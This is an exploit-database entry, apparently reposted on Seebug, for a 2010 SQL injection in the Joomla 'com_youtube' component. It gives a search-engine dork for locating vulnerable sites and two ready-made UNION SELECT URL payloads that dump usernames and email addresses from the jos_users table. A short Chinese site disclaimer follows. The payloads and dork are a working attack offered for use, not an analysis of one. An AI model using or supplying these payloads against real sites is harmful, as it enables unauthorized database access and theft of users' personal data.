# Exploit Title: Joomla "com_youtube" Sql Injection Vulnerability # Date: 2010-07-24 # Author: Forza-Dz # Software Link: http://extensions.joomla.org/extensions/multimedia/ multimedia-channels/video-channels/12037 # Version: 1.5 # Tested on: windows-xp-sp2-fr : windows-xp-sp3-fr ============================================================================== \\\\\\\\\\ Joomla "com_youtube" Sql Injection Vulnerability ///////// ============================================================================== *************************************************************************** *************************************************************************** Dork = inurl:"com_youtube" ########################################################################### ===[ Exploit ]=== http://www.site.com/index.php?option=com_youtube&id_cate=4 union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users-- or http://www.site.com/index.php?option=com_youtube&id_cate=55 union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users-- ########################################################################### Greetz @ Flit0x-Dz AnD MCA-CRB All "DZ" "MusliM" ###########################################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论